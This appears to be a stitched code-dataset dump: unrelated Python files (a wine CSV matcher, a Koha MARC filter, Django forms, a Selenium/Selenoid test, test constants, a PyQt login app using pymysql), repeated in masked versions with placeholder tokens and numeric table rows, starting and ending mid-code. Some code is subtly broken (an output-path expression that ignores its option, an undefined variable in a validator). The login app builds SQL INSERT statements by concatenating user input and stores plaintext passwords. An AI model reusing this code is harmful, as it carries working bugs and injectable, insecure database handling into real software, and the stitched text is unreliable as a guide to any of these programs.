(file_path, base_filename, file_ext) = kvutil.filename_split(optiondict['csvfile_update_in'])
# create the new filename
backupfile = kvutil.filename_proper( base_filename + optiondict['backupfile_ext'], file_path )
# messaging
print('copying ', optiondict['csvfile_update_in'], ' to ', backupfile)
# copy the input file to the backup filename
shutil.copyfile(optiondict['csvfile_update_in'], backupfile)
# set the output keys we are going to assign
if optiondict['fldWineDescrNew'] == 'cnt':
# output matches the original ref file format with the "cnt" field
optiondict['csvdictkeys'] = ['cnt','date','search','store','wine','winesrt']
elif optiondict['fldWineDescrMatch']:
# output is a modified xref format so you can look at old and new definitions
# optiondict['csvdictkeys'] = [optiondict['fldWineDescr'],optiondict['fldWineDescrNew'],optiondict['fldWineDescrMatch'], 'date','search','company','wine','winesrt']
optiondict['csvdictkeys'] = [optiondict['fldWineDescr'],optiondict['fldWineDescrNew'],optiondict['fldWineDescrMatch'], *header]
else:
# copy over the read in format
optiondict['csvdictkeys'] = [optiondict['fldWineDescrNew']] + header[1:]
# output matches expected input - should really change this to be the format of the read in file
#optiondict['csvdictkeys'] = [optiondict['fldWineDescrNew'], 'date','search','company','wine','winesrt']
print('updateFileOptionDictCheck:set csvdictkeys to:',optiondict['csvdictkeys'])
# ---------------------------------------------------------------------------
if __name__ == '__main__':
# capture the command line
optiondict = kvutil.kv_parse_command_line( optiondictconfig, debug=False )
# set the global debug flag
ppFlag = optiondict['pprint']
# set master fields
setOptionDictMasterFldValues( optiondict, debug=False )
### global variable checks ###
if optiondict['setup_check']:
print('Running global variable check')
globalVariableCheck( debug = optiondict['debug'] )
sys.exit()
# messaging
print('reading in master file:', optiondict['csvfile_master_in'])
# read in the MASTER FILE INPUT file
wines,header = kvcsv.readcsv2list_with_header(optiondict['csvfile_master_in'], headerlc=True)
# build the wine lookup dictionary
wgLookup = buildWineryGrapeLookup( wines, optiondict['fldWineDescrMaster'], optiondict['fldWineMaster'], debug=optiondict['debug'] )
# read in the UPDATE FILE INPUT file - if not updating the master file
if optiondict['csvfile_master_in'] != optiondict['csvfile_update_in']:
# messaging
print('reading in update file:', optiondict['csvfile_update_in'])
# read in the INPUT file
wines,header = kvcsv.readcsv2list_with_header(optiondict['csvfile_update_in'], headerlc=True)
# check to see if we read in any records and if not just return
if not wines:
print('wineset.py - no records read in - no work to be done - exitting')
sys.exit()
# test to see if we should set the fields based on what we just read in
updateFileOptionDictCheck( optiondict, wines, header, debug=optiondict['debug'] )
# do the assignment of wines to records
setWineryDescrFromWineryGrapeLookup( wgLookup, wines, optiondict['fldWineDescr'], optiondict['fldWine'], optiondict['fldWineDescrNew'], optiondict['fldWineDescrMatch'], debug=optiondict['debug'] )
# if enabled - set all unassigned new descriptions the default value
if optiondict['defaultnew'] is not None:
# message
print('Setting ', optiondict['fldWineDescrNew'], ' to ', optiondict['defaultnew'], 'if not set')
# do the work
setDigitFld2Value( wines, optiondict['fldWineDescrNew'], optiondict['defaultnew'], debug=optiondict['debug'] )
# save the output to the file of interest
kvcsv.writelist2csv( optiondict['csvfile_update_out'], wines, optiondict['csvdictkeys'] )
# messaging
print('Saved results to:', optiondict['csvfile_update_out'])
| [
7,
13,
15,
18,
19
] |
679 | c6cce2edafd7683af766b932d90ca170359e648a | <mask token>
def main():
total_count = 0
valid_count = 0
with open(options['INPUT'], 'rb') as fh:
reader = MARCReader(fh, to_unicode=True, force_utf8=True)
if not options['--csv']:
writer = MARCWriter(open('out.mrc' or options['--output'], 'wb'))
for record in reader:
include_record = False
for item in record.get_fields('952'):
valid = validate_item(item)
total_count += 1
if valid is True:
valid_count += 1
include_record = True
if include_record is True:
writer.write(record)
print('Total items: %i | Items included: %i' % (total_count,
valid_count))
elif options['--csv']:
koha_record_ids = set()
for record in reader:
total_count += 1
for item in record.get_fields('952'):
valid = validate_item(item)
if valid:
id = record.get_fields(MARC_ID_FIELD)[0].get_subfields(
MARC_ID_SUBFIELD)[0]
koha_record_ids.add(id)
break
csvreader = csv.DictReader(open(options['--csv'], 'r'))
gg_record_ids = set()
for row in csvreader:
gg_record_ids.add(row[GG_ID_COLUMN])
print('Total Koha Bibs: %i' % total_count)
print('Koha Bibs with circulating items: %i ' % len(
koha_record_ids))
print('Total GreenGlass Bibs: %i' % len(gg_record_ids))
print('Weeded Items (I in GG & not in Koha): %i' % len(
gg_record_ids - koha_record_ids))
print('Added Items (I in Koha & not in GG): %i' % len(
koha_record_ids - gg_record_ids))
<mask token>
| <mask token>
def validate_item(item):
status = []
valid = True
if item['q'] and item['q'] != '0':
status.append('checked out')
if item['7'] and item['7'] != '0':
status.append(notforloan_codes[item['7']])
valid = False
if item['4'] and item['4'] != '0':
status.append('damaged')
valid = False
if item['1'] and item['1'] != '0':
status.append(lost_codes[item['1']])
valid = False
if item['0'] and item['0'] != '0':
status.append('withdrawn')
valid = False
if item['c'] not in valid_locations:
valid = False
if item['y'] not in valid_types:
valid = False
if len(status) > 0 and options.get('--debug'):
print('"' + record.title() + '" item status: ' + ', '.join(status))
return valid
def main():
total_count = 0
valid_count = 0
with open(options['INPUT'], 'rb') as fh:
reader = MARCReader(fh, to_unicode=True, force_utf8=True)
if not options['--csv']:
writer = MARCWriter(open('out.mrc' or options['--output'], 'wb'))
for record in reader:
include_record = False
for item in record.get_fields('952'):
valid = validate_item(item)
total_count += 1
if valid is True:
valid_count += 1
include_record = True
if include_record is True:
writer.write(record)
print('Total items: %i | Items included: %i' % (total_count,
valid_count))
elif options['--csv']:
koha_record_ids = set()
for record in reader:
total_count += 1
for item in record.get_fields('952'):
valid = validate_item(item)
if valid:
id = record.get_fields(MARC_ID_FIELD)[0].get_subfields(
MARC_ID_SUBFIELD)[0]
koha_record_ids.add(id)
break
csvreader = csv.DictReader(open(options['--csv'], 'r'))
gg_record_ids = set()
for row in csvreader:
gg_record_ids.add(row[GG_ID_COLUMN])
print('Total Koha Bibs: %i' % total_count)
print('Koha Bibs with circulating items: %i ' % len(
koha_record_ids))
print('Total GreenGlass Bibs: %i' % len(gg_record_ids))
print('Weeded Items (I in GG & not in Koha): %i' % len(
gg_record_ids - koha_record_ids))
print('Added Items (I in Koha & not in GG): %i' % len(
koha_record_ids - gg_record_ids))
<mask token>
| <mask token>
def validate_item(item):
status = []
valid = True
if item['q'] and item['q'] != '0':
status.append('checked out')
if item['7'] and item['7'] != '0':
status.append(notforloan_codes[item['7']])
valid = False
if item['4'] and item['4'] != '0':
status.append('damaged')
valid = False
if item['1'] and item['1'] != '0':
status.append(lost_codes[item['1']])
valid = False
if item['0'] and item['0'] != '0':
status.append('withdrawn')
valid = False
if item['c'] not in valid_locations:
valid = False
if item['y'] not in valid_types:
valid = False
if len(status) > 0 and options.get('--debug'):
print('"' + record.title() + '" item status: ' + ', '.join(status))
return valid
def main():
total_count = 0
valid_count = 0
with open(options['INPUT'], 'rb') as fh:
reader = MARCReader(fh, to_unicode=True, force_utf8=True)
if not options['--csv']:
writer = MARCWriter(open('out.mrc' or options['--output'], 'wb'))
for record in reader:
include_record = False
for item in record.get_fields('952'):
valid = validate_item(item)
total_count += 1
if valid is True:
valid_count += 1
include_record = True
if include_record is True:
writer.write(record)
print('Total items: %i | Items included: %i' % (total_count,
valid_count))
elif options['--csv']:
koha_record_ids = set()
for record in reader:
total_count += 1
for item in record.get_fields('952'):
valid = validate_item(item)
if valid:
id = record.get_fields(MARC_ID_FIELD)[0].get_subfields(
MARC_ID_SUBFIELD)[0]
koha_record_ids.add(id)
break
csvreader = csv.DictReader(open(options['--csv'], 'r'))
gg_record_ids = set()
for row in csvreader:
gg_record_ids.add(row[GG_ID_COLUMN])
print('Total Koha Bibs: %i' % total_count)
print('Koha Bibs with circulating items: %i ' % len(
koha_record_ids))
print('Total GreenGlass Bibs: %i' % len(gg_record_ids))
print('Weeded Items (I in GG & not in Koha): %i' % len(
gg_record_ids - koha_record_ids))
print('Added Items (I in Koha & not in GG): %i' % len(
koha_record_ids - gg_record_ids))
if __name__ == '__main__':
options = docopt(__doc__)
main()
| <mask token>
import csv
from docopt import docopt
from pymarc import MARCReader, MARCWriter
lost_codes = {'0': '', '1': 'Lost', '2': 'Long Overdue (Lost)', '3':
'Lost and Paid For', '4': 'Missing', '5': 'Lost (On Search)', '6':
'Claims Returned'}
notforloan_codes = {'-3': 'Repair', '-2': 'In Processing', '-1': 'Ordered',
'0': '', '1': 'Library Use Only', '2': 'Staff Collection', '3':
'Bindery', '4': 'By Appointment', '5': 'On display'}
valid_locations = ['CART', 'FACDEV', 'MAIN', 'NEWBOOK', 'DISPLAY']
valid_types = ['BOOK', 'SUPPL']
GG_ID_COLUMN = 'Bib Record Number'
MARC_ID_FIELD = '999'
MARC_ID_SUBFIELD = 'c'
def validate_item(item):
status = []
valid = True
if item['q'] and item['q'] != '0':
status.append('checked out')
if item['7'] and item['7'] != '0':
status.append(notforloan_codes[item['7']])
valid = False
if item['4'] and item['4'] != '0':
status.append('damaged')
valid = False
if item['1'] and item['1'] != '0':
status.append(lost_codes[item['1']])
valid = False
if item['0'] and item['0'] != '0':
status.append('withdrawn')
valid = False
if item['c'] not in valid_locations:
valid = False
if item['y'] not in valid_types:
valid = False
if len(status) > 0 and options.get('--debug'):
print('"' + record.title() + '" item status: ' + ', '.join(status))
return valid
def main():
total_count = 0
valid_count = 0
with open(options['INPUT'], 'rb') as fh:
reader = MARCReader(fh, to_unicode=True, force_utf8=True)
if not options['--csv']:
writer = MARCWriter(open('out.mrc' or options['--output'], 'wb'))
for record in reader:
include_record = False
for item in record.get_fields('952'):
valid = validate_item(item)
total_count += 1
if valid is True:
valid_count += 1
include_record = True
if include_record is True:
writer.write(record)
print('Total items: %i | Items included: %i' % (total_count,
valid_count))
elif options['--csv']:
koha_record_ids = set()
for record in reader:
total_count += 1
for item in record.get_fields('952'):
valid = validate_item(item)
if valid:
id = record.get_fields(MARC_ID_FIELD)[0].get_subfields(
MARC_ID_SUBFIELD)[0]
koha_record_ids.add(id)
break
csvreader = csv.DictReader(open(options['--csv'], 'r'))
gg_record_ids = set()
for row in csvreader:
gg_record_ids.add(row[GG_ID_COLUMN])
print('Total Koha Bibs: %i' % total_count)
print('Koha Bibs with circulating items: %i ' % len(
koha_record_ids))
print('Total GreenGlass Bibs: %i' % len(gg_record_ids))
print('Weeded Items (I in GG & not in Koha): %i' % len(
gg_record_ids - koha_record_ids))
print('Added Items (I in Koha & not in GG): %i' % len(
koha_record_ids - gg_record_ids))
if __name__ == '__main__':
options = docopt(__doc__)
main()
| """Usage:
sharedprint.py INPUT [--output=out.mrc]
sharedprint.py INPUT [--csv=greenglass.csv]
Process Koha MARC export for SCELC Shared Print.
The two uses above either 1) create a subset of the MARC input that's limited to
circulating items only or 2) performs a comparison between what's in the catalog
and what's in GreenGlass i.e. how many records were added and weeded.
Arguments:
INPUT MARC records (.mrc file)
Options:
-h --help show this usage information
--debug show debug information as the script runs
--output=FILE output records to this file [default: out.mrc]
--csv=CSV GreenGlass CSV to compare input MARC file against
"""
import csv
from docopt import docopt
from pymarc import MARCReader, MARCWriter
# https://library-staff.cca.edu/cgi-bin/koha/admin/authorised_values.pl?searchfield=LOST
lost_codes = {
"0": "",
"1": "Lost",
"2": "Long Overdue (Lost)",
"3": "Lost and Paid For",
"4": "Missing",
"5": "Lost (On Search)",
"6": "Claims Returned",
}
# https://library-staff.cca.edu/cgi-bin/koha/admin/authorised_values.pl?searchfield=NOT_LOAN
notforloan_codes = {
"-3": "Repair",
"-2": "In Processing",
"-1": "Ordered",
"0": "",
"1": "Library Use Only",
"2": "Staff Collection",
"3": "Bindery",
"4": "By Appointment",
"5": "On display",
}
# https://library-staff.cca.edu/cgi-bin/koha/admin/authorised_values.pl?searchfield=LOC
valid_locations = [
"CART",
"FACDEV",
"MAIN",
"NEWBOOK",
"DISPLAY",
]
# https://library-staff.cca.edu/cgi-bin/koha/admin/itemtypes.pl
valid_types = [
"BOOK",
"SUPPL",
]
# name of column in the GreenGlass spreadsheet that contains the bib record ID
GG_ID_COLUMN = 'Bib Record Number'
# field and subfield in MARC record that contains the bib record ID
# Koha appears to store it in both 999$c & $d
MARC_ID_FIELD = '999'
MARC_ID_SUBFIELD = 'c'
def validate_item(item):
# "item status" is an agglomeration of several things
status = []
# whether the _item_ we're looking at should be included
valid = True
# checked out, will be a date if item is checked out
if item['q'] and item['q'] != "0":
status.append('checked out')
# "not for loan", variety of reasons why an item might not circ
if item['7'] and item['7'] != "0":
status.append(notforloan_codes[item['7']])
valid = False
# 1 is an item is damanged
if item['4'] and item['4'] != "0":
status.append('damaged')
valid = False
# lost, variety of codes
if item['1'] and item['1'] != "0":
status.append(lost_codes[item['1']])
valid = False
# 1 if an item has been withdrawn
if item['0'] and item['0'] != "0":
status.append('withdrawn')
valid = False
# filter items based on location & type
if item['c'] not in valid_locations:
valid = False
if item['y'] not in valid_types:
valid = False
if len(status) > 0 and options.get('--debug'):
print('"' + record.title() + '" item status: ' + ', '.join(status))
return valid
def main():
total_count = 0
valid_count = 0
with open(options['INPUT'], 'rb') as fh:
reader = MARCReader(fh, to_unicode=True, force_utf8=True)
# 1) first mode: write a MARC output file
if not options['--csv']:
writer = MARCWriter(open('out.mrc' or options['--output'], 'wb'))
for record in reader:
# whether we'll include the _bib_ record in export file
include_record = False
# Koha stores item data in 952 fields, one per item
for item in record.get_fields('952'):
valid = validate_item(item)
total_count += 1
if valid is True:
valid_count += 1
# if there's any valid item then the bib should be included
include_record = True
if include_record is True:
writer.write(record)
print('Total items: %i | Items included: %i' % (total_count, valid_count))
elif options['--csv']:
koha_record_ids = set()
for record in reader:
total_count += 1
for item in record.get_fields('952'):
valid = validate_item(item)
if valid:
id = record.get_fields(MARC_ID_FIELD)[0].get_subfields(MARC_ID_SUBFIELD)[0]
koha_record_ids.add(id)
# stop looking at items after we find the first valid one
break
csvreader = csv.DictReader(open(options['--csv'], 'r'))
gg_record_ids = set()
for row in csvreader:
gg_record_ids.add(row[GG_ID_COLUMN])
print('Total Koha Bibs: %i' % total_count)
print('Koha Bibs with circulating items: %i ' % len(koha_record_ids))
print('Total GreenGlass Bibs: %i' % len(gg_record_ids))
print('Weeded Items (I in GG & not in Koha): %i' % len(gg_record_ids - koha_record_ids))
print('Added Items (I in Koha & not in GG): %i' % len(koha_record_ids - gg_record_ids))
if __name__ == '__main__':
options = docopt(__doc__)
# print(options)
main()
| [
1,
2,
3,
5,
6
] |
680 | 3d45fd7dcb3b382efaefe2797ebeb33216a840fa | <mask token>
class PictureUploadForm(forms.ModelForm):
class Meta:
model = Picture
exclude = ()
<mask token>
<mask token>
class PictureUpdateForm(forms.Form):
width = forms.IntegerField()
height = forms.IntegerField()
size = forms.FloatField()
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
for field_name, field in self.fields.items():
field.widget.attrs['class'] = 'form-control text-center'
field.help_text = ''
def clean(self):
cleaned_data = super().clean()
if cleaned_data['width'] < 1 or cleaned_data['height'
] < 1 or cleaned_data['size'] < 1:
raise forms.ValidationError('Значения в полях должны быть больше 0'
)
| <mask token>
class PictureUploadForm(forms.ModelForm):
class Meta:
model = Picture
exclude = ()
<mask token>
def clean(self):
cleaned_data = super().clean()
if cleaned_data['img'] and cleaned_data['urlImg']:
raise forms.ValidationError(
'Должно быть заполнено только одно из полей')
class PictureUpdateForm(forms.Form):
width = forms.IntegerField()
height = forms.IntegerField()
size = forms.FloatField()
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
for field_name, field in self.fields.items():
field.widget.attrs['class'] = 'form-control text-center'
field.help_text = ''
def clean(self):
cleaned_data = super().clean()
if cleaned_data['width'] < 1 or cleaned_data['height'
] < 1 or cleaned_data['size'] < 1:
raise forms.ValidationError('Значения в полях должны быть больше 0'
)
| <mask token>
class PictureUploadForm(forms.ModelForm):
class Meta:
model = Picture
exclude = ()
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
for field_name, field in self.fields.items():
field.widget.attrs['class'] = 'form-control text-center'
field.help_text = ''
def clean(self):
cleaned_data = super().clean()
if cleaned_data['img'] and cleaned_data['urlImg']:
raise forms.ValidationError(
'Должно быть заполнено только одно из полей')
class PictureUpdateForm(forms.Form):
width = forms.IntegerField()
height = forms.IntegerField()
size = forms.FloatField()
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
for field_name, field in self.fields.items():
field.widget.attrs['class'] = 'form-control text-center'
field.help_text = ''
def clean(self):
cleaned_data = super().clean()
if cleaned_data['width'] < 1 or cleaned_data['height'
] < 1 or cleaned_data['size'] < 1:
raise forms.ValidationError('Значения в полях должны быть больше 0'
)
| from django import forms
from .models import Picture
class PictureUploadForm(forms.ModelForm):
class Meta:
model = Picture
exclude = ()
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
for field_name, field in self.fields.items():
field.widget.attrs['class'] = 'form-control text-center'
field.help_text = ''
def clean(self):
cleaned_data = super().clean()
if cleaned_data['img'] and cleaned_data['urlImg']:
raise forms.ValidationError(
'Должно быть заполнено только одно из полей')
class PictureUpdateForm(forms.Form):
width = forms.IntegerField()
height = forms.IntegerField()
size = forms.FloatField()
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
for field_name, field in self.fields.items():
field.widget.attrs['class'] = 'form-control text-center'
field.help_text = ''
def clean(self):
cleaned_data = super().clean()
if cleaned_data['width'] < 1 or cleaned_data['height'
] < 1 or cleaned_data['size'] < 1:
raise forms.ValidationError('Значения в полях должны быть больше 0'
)
| from django import forms
from .models import Picture
class PictureUploadForm(forms.ModelForm):
class Meta:
model = Picture
exclude = ()
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
for field_name, field in self.fields.items():
field.widget.attrs['class'] = 'form-control text-center'
field.help_text = ''
def clean(self):
cleaned_data = super().clean()
if cleaned_data['img'] and cleaned_data['urlImg']:
raise forms.ValidationError("Должно быть заполнено только одно из полей")
class PictureUpdateForm(forms.Form):
width = forms.IntegerField()
height = forms.IntegerField()
size = forms.FloatField()
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
for field_name, field in self.fields.items():
field.widget.attrs['class'] = 'form-control text-center'
field.help_text = ''
def clean(self):
cleaned_data = super().clean()
if cleaned_data['width'] < 1 or cleaned_data['height'] < 1 or cleaned_data['size'] < 1:
raise forms.ValidationError('Значения в полях должны быть больше 0') | [
5,
6,
7,
8,
9
] |
681 | d84641ce2854d4af26cd46abbe9557d6006cfc2e | <mask token>
| <mask token>
browser.get('https://www.google.com')
time.sleep(3)
browser.maximize_window()
<mask token>
print(title)
assert 'Google' == title
browser.close()
| <mask token>
capabilities = {'browserName': 'firefox', 'browserVersion': '92.0',
'selenoid:options': {'enableVNC': True, 'enableVideo': True}}
browser = webdriver.Remote(command_executor='http://localhost:4444/wd/hub',
desired_capabilities=capabilities)
browser.get('https://www.google.com')
time.sleep(3)
browser.maximize_window()
title = browser.title
print(title)
assert 'Google' == title
browser.close()
| import time
from selenium import webdriver
from webdriver_manager.chrome import ChromeDriverManager
from webdriver_manager.firefox import GeckoDriverManager
from webdriver_manager.microsoft import EdgeChromiumDriverManager
import os
from selenium import webdriver
capabilities = {'browserName': 'firefox', 'browserVersion': '92.0',
'selenoid:options': {'enableVNC': True, 'enableVideo': True}}
browser = webdriver.Remote(command_executor='http://localhost:4444/wd/hub',
desired_capabilities=capabilities)
browser.get('https://www.google.com')
time.sleep(3)
browser.maximize_window()
title = browser.title
print(title)
assert 'Google' == title
browser.close()
| import time
from selenium import webdriver
from webdriver_manager.chrome import ChromeDriverManager
from webdriver_manager.firefox import GeckoDriverManager
from webdriver_manager.microsoft import EdgeChromiumDriverManager
import os
# caps = {'browserName': os.getenv('BROWSER', 'firefox')}
# browser = webdriver.Remote(
# command_executor='http://localhost:4444/wd/hub',
# desired_capabilities=caps
# )
from selenium import webdriver
capabilities = {
"browserName": "firefox",
"browserVersion": "92.0",
"selenoid:options": {
"enableVNC": True,
"enableVideo": True
}
}
browser = webdriver.Remote(
command_executor="http://localhost:4444/wd/hub",
desired_capabilities=capabilities)
browser.get("https://www.google.com")
time.sleep(3)
browser.maximize_window()
title = browser.title
print(title)
assert "Google" == title
browser.close()
#browser.quit() | [
0,
1,
2,
3,
4
] |
682 | bad719d968b4e358f863b7ef13bc12127f726806 | <mask token>
| <mask token>
log = logging.getLogger(__name__)
dir_path = os.path.dirname(os.path.realpath(__file__))
TEST_FILE = os.path.join(dir_path, 'test_gene_map_table.tsv.gz')
| <mask token>
import logging
import os
log = logging.getLogger(__name__)
dir_path = os.path.dirname(os.path.realpath(__file__))
TEST_FILE = os.path.join(dir_path, 'test_gene_map_table.tsv.gz')
| # -*- coding: utf-8 -*-
"""Testing constants for Bio2BEL FlyBase."""
import logging
import os
log = logging.getLogger(__name__)
dir_path = os.path.dirname(os.path.realpath(__file__))
TEST_FILE = os.path.join(dir_path, 'test_gene_map_table.tsv.gz')
| null | [
0,
1,
2,
3
] |
683 | 0ff6e22f8704a0c6c0ffff3c53761b9d3a531b6d | <mask token>
class Ui_Login(QtWidgets.QDialog):
def __init__(self):
super(Ui_Login, self).__init__()
uic.loadUi('login.ui', self)
self.icon = self.findChild(QtWidgets.QLabel, 'ilogin')
self.icon.setStyleSheet('image: url(sorce/roundicon.png)')
self.inputUsername = self.findChild(QtWidgets.QLineEdit, 'username')
self.inputPassword = self.findChild(QtWidgets.QLineEdit, 'password')
self.daftarButton = self.findChild(QtWidgets.QPushButton, 'daftarBtn')
self.daftarButton.clicked.connect(self.forDaftar)
self.loginButton = self.findChild(QtWidgets.QPushButton, 'login_2')
self.loginButton.clicked.connect(self.testButton)
self.show()
def testButton(self):
user = self.inputUsername.text()
pw = self.inputPassword.text()
con = pymysql.connect(db='bookingfutsal', user='root', passwd='',
host='localhost', port=3306, autocommit=True)
cur = con.cursor()
sql = 'SELECT * FROM admin WHERE username=%s AND password=%s'
data = cur.execute(sql, (user, pw))
if len(cur.fetchall()) > 0:
self.close()
super(Ui_Login, self).__init__()
uic.loadUi('booking.ui', self)
self.gambar = self.findChild(QtWidgets.QLabel, 'piclap')
self.gambar.setStyleSheet('background-image: url(sorce/lp2.jpg)')
self.bNamaPembayar = self.findChild(QtWidgets.QLineEdit,
'namapembayar')
self.bNominalDp = self.findChild(QtWidgets.QLineEdit, 'nominaldp')
self.bBooking = self.findChild(QtWidgets.QPushButton, 'booking')
self.bBooking.clicked.connect(self.bookingFunc)
self.show()
<mask token>
def daftarFunc(self):
user = self.dUsername.text()
pw = self.dPassword.text()
con = pymysql.connect(db='bookingfutsal', user='root', passwd='',
host='localhost', port=3306, autocommit=True)
cur = con.cursor()
insert = user, pw
sql = 'INSERT INTO admin (username, password) VALUES' + str(insert)
data = cur.execute(sql)
self.close()
self.__init__()
def bookingFunc(self):
nama = self.bNamaPembayar.text()
nominal = self.bNominalDp.text()
con = pymysql.connect(db='bookingfutsal', user='root', passwd='',
host='localhost', port=3306, autocommit=True)
cur = con.cursor()
insert = nama, nominal
sql = 'INSERT INTO pembayaran (atasNama, namaPembayaran) VALUES' + str(
insert)
data = cur.execute(sql)
<mask token>
| <mask token>
class Ui_Login(QtWidgets.QDialog):
def __init__(self):
super(Ui_Login, self).__init__()
uic.loadUi('login.ui', self)
self.icon = self.findChild(QtWidgets.QLabel, 'ilogin')
self.icon.setStyleSheet('image: url(sorce/roundicon.png)')
self.inputUsername = self.findChild(QtWidgets.QLineEdit, 'username')
self.inputPassword = self.findChild(QtWidgets.QLineEdit, 'password')
self.daftarButton = self.findChild(QtWidgets.QPushButton, 'daftarBtn')
self.daftarButton.clicked.connect(self.forDaftar)
self.loginButton = self.findChild(QtWidgets.QPushButton, 'login_2')
self.loginButton.clicked.connect(self.testButton)
self.show()
def testButton(self):
user = self.inputUsername.text()
pw = self.inputPassword.text()
con = pymysql.connect(db='bookingfutsal', user='root', passwd='',
host='localhost', port=3306, autocommit=True)
cur = con.cursor()
sql = 'SELECT * FROM admin WHERE username=%s AND password=%s'
data = cur.execute(sql, (user, pw))
if len(cur.fetchall()) > 0:
self.close()
super(Ui_Login, self).__init__()
uic.loadUi('booking.ui', self)
self.gambar = self.findChild(QtWidgets.QLabel, 'piclap')
self.gambar.setStyleSheet('background-image: url(sorce/lp2.jpg)')
self.bNamaPembayar = self.findChild(QtWidgets.QLineEdit,
'namapembayar')
self.bNominalDp = self.findChild(QtWidgets.QLineEdit, 'nominaldp')
self.bBooking = self.findChild(QtWidgets.QPushButton, 'booking')
self.bBooking.clicked.connect(self.bookingFunc)
self.show()
def forDaftar(self):
self.close()
super(Ui_Login, self).__init__()
uic.loadUi('daftar.ui', self)
self.dUsername = self.findChild(QtWidgets.QLineEdit, 'username')
self.dPassword = self.findChild(QtWidgets.QLineEdit, 'password')
self.dAlamat = self.findChild(QtWidgets.QLineEdit, 'alamat')
self.dNoTelpU = self.findChild(QtWidgets.QLineEdit, 'notelepon')
self.dDaftarButton = self.findChild(QtWidgets.QPushButton, 'daftar')
self.dDaftarButton.clicked.connect(self.daftarFunc)
self.show()
def daftarFunc(self):
user = self.dUsername.text()
pw = self.dPassword.text()
con = pymysql.connect(db='bookingfutsal', user='root', passwd='',
host='localhost', port=3306, autocommit=True)
cur = con.cursor()
insert = user, pw
sql = 'INSERT INTO admin (username, password) VALUES' + str(insert)
data = cur.execute(sql)
self.close()
self.__init__()
def bookingFunc(self):
nama = self.bNamaPembayar.text()
nominal = self.bNominalDp.text()
con = pymysql.connect(db='bookingfutsal', user='root', passwd='',
host='localhost', port=3306, autocommit=True)
cur = con.cursor()
insert = nama, nominal
sql = 'INSERT INTO pembayaran (atasNama, namaPembayaran) VALUES' + str(
insert)
data = cur.execute(sql)
<mask token>
app.exec_()
| <mask token>
class Ui_Login(QtWidgets.QDialog):
def __init__(self):
super(Ui_Login, self).__init__()
uic.loadUi('login.ui', self)
self.icon = self.findChild(QtWidgets.QLabel, 'ilogin')
self.icon.setStyleSheet('image: url(sorce/roundicon.png)')
self.inputUsername = self.findChild(QtWidgets.QLineEdit, 'username')
self.inputPassword = self.findChild(QtWidgets.QLineEdit, 'password')
self.daftarButton = self.findChild(QtWidgets.QPushButton, 'daftarBtn')
self.daftarButton.clicked.connect(self.forDaftar)
self.loginButton = self.findChild(QtWidgets.QPushButton, 'login_2')
self.loginButton.clicked.connect(self.testButton)
self.show()
def testButton(self):
user = self.inputUsername.text()
pw = self.inputPassword.text()
con = pymysql.connect(db='bookingfutsal', user='root', passwd='',
host='localhost', port=3306, autocommit=True)
cur = con.cursor()
sql = 'SELECT * FROM admin WHERE username=%s AND password=%s'
data = cur.execute(sql, (user, pw))
if len(cur.fetchall()) > 0:
self.close()
super(Ui_Login, self).__init__()
uic.loadUi('booking.ui', self)
self.gambar = self.findChild(QtWidgets.QLabel, 'piclap')
self.gambar.setStyleSheet('background-image: url(sorce/lp2.jpg)')
self.bNamaPembayar = self.findChild(QtWidgets.QLineEdit,
'namapembayar')
self.bNominalDp = self.findChild(QtWidgets.QLineEdit, 'nominaldp')
self.bBooking = self.findChild(QtWidgets.QPushButton, 'booking')
self.bBooking.clicked.connect(self.bookingFunc)
self.show()
def forDaftar(self):
self.close()
super(Ui_Login, self).__init__()
uic.loadUi('daftar.ui', self)
self.dUsername = self.findChild(QtWidgets.QLineEdit, 'username')
self.dPassword = self.findChild(QtWidgets.QLineEdit, 'password')
self.dAlamat = self.findChild(QtWidgets.QLineEdit, 'alamat')
self.dNoTelpU = self.findChild(QtWidgets.QLineEdit, 'notelepon')
self.dDaftarButton = self.findChild(QtWidgets.QPushButton, 'daftar')
self.dDaftarButton.clicked.connect(self.daftarFunc)
self.show()
def daftarFunc(self):
user = self.dUsername.text()
pw = self.dPassword.text()
con = pymysql.connect(db='bookingfutsal', user='root', passwd='',
host='localhost', port=3306, autocommit=True)
cur = con.cursor()
insert = user, pw
sql = 'INSERT INTO admin (username, password) VALUES' + str(insert)
data = cur.execute(sql)
self.close()
self.__init__()
def bookingFunc(self):
nama = self.bNamaPembayar.text()
nominal = self.bNominalDp.text()
con = pymysql.connect(db='bookingfutsal', user='root', passwd='',
host='localhost', port=3306, autocommit=True)
cur = con.cursor()
insert = nama, nominal
sql = 'INSERT INTO pembayaran (atasNama, namaPembayaran) VALUES' + str(
insert)
data = cur.execute(sql)
app = QtWidgets.QApplication(sys.argv)
window = Ui_Login()
app.exec_()
| from PyQt5 import QtWidgets, uic
import sys
import pymysql
import mysql.connector
class Ui_Login(QtWidgets.QDialog):
def __init__(self):
super(Ui_Login, self).__init__()
uic.loadUi('login.ui', self)
self.icon = self.findChild(QtWidgets.QLabel, 'ilogin')
self.icon.setStyleSheet('image: url(sorce/roundicon.png)')
self.inputUsername = self.findChild(QtWidgets.QLineEdit, 'username')
self.inputPassword = self.findChild(QtWidgets.QLineEdit, 'password')
self.daftarButton = self.findChild(QtWidgets.QPushButton, 'daftarBtn')
self.daftarButton.clicked.connect(self.forDaftar)
self.loginButton = self.findChild(QtWidgets.QPushButton, 'login_2')
self.loginButton.clicked.connect(self.testButton)
self.show()
def testButton(self):
user = self.inputUsername.text()
pw = self.inputPassword.text()
con = pymysql.connect(db='bookingfutsal', user='root', passwd='',
host='localhost', port=3306, autocommit=True)
cur = con.cursor()
sql = 'SELECT * FROM admin WHERE username=%s AND password=%s'
data = cur.execute(sql, (user, pw))
if len(cur.fetchall()) > 0:
self.close()
super(Ui_Login, self).__init__()
uic.loadUi('booking.ui', self)
self.gambar = self.findChild(QtWidgets.QLabel, 'piclap')
self.gambar.setStyleSheet('background-image: url(sorce/lp2.jpg)')
self.bNamaPembayar = self.findChild(QtWidgets.QLineEdit,
'namapembayar')
self.bNominalDp = self.findChild(QtWidgets.QLineEdit, 'nominaldp')
self.bBooking = self.findChild(QtWidgets.QPushButton, 'booking')
